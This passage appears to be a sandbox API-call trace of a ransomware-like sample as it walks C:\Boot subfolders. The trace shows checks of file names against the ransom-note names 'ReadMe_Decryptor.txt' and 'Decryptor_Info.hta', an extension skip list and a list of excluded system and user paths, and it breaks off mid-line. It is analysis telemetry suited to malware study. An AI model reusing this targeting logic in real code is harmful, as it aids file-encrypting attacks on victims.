FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0105.325] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0105.325] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0105.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0105.325] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0105.325] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0105.326] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0105.326] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0105.326] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0105.326] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0105.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7063f8 [0105.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7558 [0105.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7063f8 | out: hHeap=0x6d0000) returned 1 [0105.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e75e8 [0105.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7558 | out: hHeap=0x6d0000) returned 1 [0105.326] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0105.326] FindClose (in: hFindFile=0x77e610 | out: hFindFile=0x77e610) returned 1 [0105.326] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0105.326] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0105.326] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0105.326] lstrlenW (lpString="de-DE") returned 5 [0105.326] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="de-DE" | out: lpString1="C:\\Boot\\de-DE") returned="C:\\Boot\\de-DE" [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Windows") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\ProgramData") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Intel") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\msys32") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Qt") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\ProgramData") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Program Files") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Windows") returned -1 [0105.327] lstrcmpiW (lpString1="C:\\Boot\\de-DE", lpString2="C:\\Program Files (x86)") returned -1 [0105.327] lstrcatW (in: lpString1="C:\\Boot\\de-DE", lpString2="\\" | out: lpString1="C:\\Boot\\de-DE\\") returned="C:\\Boot\\de-DE\\" [0105.327] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0105.327] FindFirstFileExW (in: lpFileName="C:\\Boot\\de-DE\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72abb8 [0105.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.477] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.477] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.477] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0105.478] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0105.478] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0105.478] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.478] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0105.478] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0105.478] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0105.478] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0105.478] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0105.478] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0105.478] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7b2b90 [0105.478] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7798 [0105.478] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b2b90 | out: hHeap=0x6d0000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7828 [0105.478] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7798 | out: hHeap=0x6d0000) returned 1 [0105.478] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0105.478] FindClose (in: hFindFile=0x72abb8 | out: hFindFile=0x72abb8) returned 1 [0105.479] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0105.479] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0105.479] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0105.479] lstrlenW (lpString="el-GR") returned 5 [0105.479] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="el-GR" | out: lpString1="C:\\Boot\\el-GR") returned="C:\\Boot\\el-GR" [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Windows") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\ProgramData") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Intel") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\msys32") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Qt") returned -1 [0105.479] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\ProgramData") returned -1 [0105.480] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Program Files") returned -1 [0105.480] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Windows") returned -1 [0105.480] lstrcmpiW (lpString1="C:\\Boot\\el-GR", lpString2="C:\\Program Files (x86)") returned -1 [0105.480] lstrcatW (in: lpString1="C:\\Boot\\el-GR", lpString2="\\" | out: lpString1="C:\\Boot\\el-GR\\") returned="C:\\Boot\\el-GR\\" [0105.480] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0105.480] FindFirstFileExW (in: lpFileName="C:\\Boot\\el-GR\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72abb8 [0105.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.480] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.480] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.481] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0105.481] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0105.481] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0105.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0105.481] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0105.481] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0105.481] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0105.481] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0105.481] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0105.481] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0105.481] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7b2b90 [0105.481] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7798 [0105.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b2b90 | out: hHeap=0x6d0000) returned 1 [0105.481] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7870 [0105.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7798 | out: hHeap=0x6d0000) returned 1 [0105.481] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0105.481] FindClose (in: hFindFile=0x72abb8 | out: hFindFile=0x72abb8) returned 1 [0105.482] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0105.482] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0105.482] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0105.482] lstrlenW (lpString="en-US") returned 5 [0105.482] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="en-US" | out: lpString1="C:\\Boot\\en-US") returned="C:\\Boot\\en-US" [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Windows") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\ProgramData") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Intel") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\msys32") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Qt") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\ProgramData") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Program Files") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Windows") returned -1 [0105.482] lstrcmpiW (lpString1="C:\\Boot\\en-US", lpString2="C:\\Program Files (x86)") returned -1 [0105.482] lstrcatW (in: lpString1="C:\\Boot\\en-US", lpString2="\\" | out: lpString1="C:\\Boot\\en-US\\") returned="C:\\Boot\\en-US\\" [0105.483] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0105.483] FindFirstFileExW (in: lpFileName="C:\\Boot\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758848 [0105.691] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.691] FindNextFileW (in: hFindFile=0x758848, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.691] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.691] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.691] FindNextFileW (in: hFindFile=0x758848, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0105.691] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0105.691] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0105.691] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0105.692] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0105.692] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0105.692] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0105.692] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0105.692] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0105.692] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0105.692] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7576f8 [0105.692] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7990 [0105.692] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7576f8 | out: hHeap=0x6d0000) returned 1 [0105.692] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e79d8 [0105.692] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7990 | out: hHeap=0x6d0000) returned 1 [0105.692] FindNextFileW (in: hFindFile=0x758848, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0105.692] lstrcmpW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0105.692] lstrcmpW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0105.692] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.692] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Decryptor_Info.hta") returned 1 [0105.692] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0105.692] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0105.693] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0105.693] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0105.693] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0105.693] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0105.693] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7576f8 [0105.693] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7990 [0105.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7576f8 | out: hHeap=0x6d0000) returned 1 [0105.693] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7a20 [0105.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7990 | out: hHeap=0x6d0000) returned 1 [0105.693] FindNextFileW (in: hFindFile=0x758848, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0105.693] FindClose (in: hFindFile=0x758848 | out: hFindFile=0x758848) returned 1 [0105.694] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0105.694] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0105.694] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0105.694] lstrlenW (lpString="es-ES") returned 5 [0105.694] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="es-ES" | out: lpString1="C:\\Boot\\es-ES") returned="C:\\Boot\\es-ES" [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Windows") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\ProgramData") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS 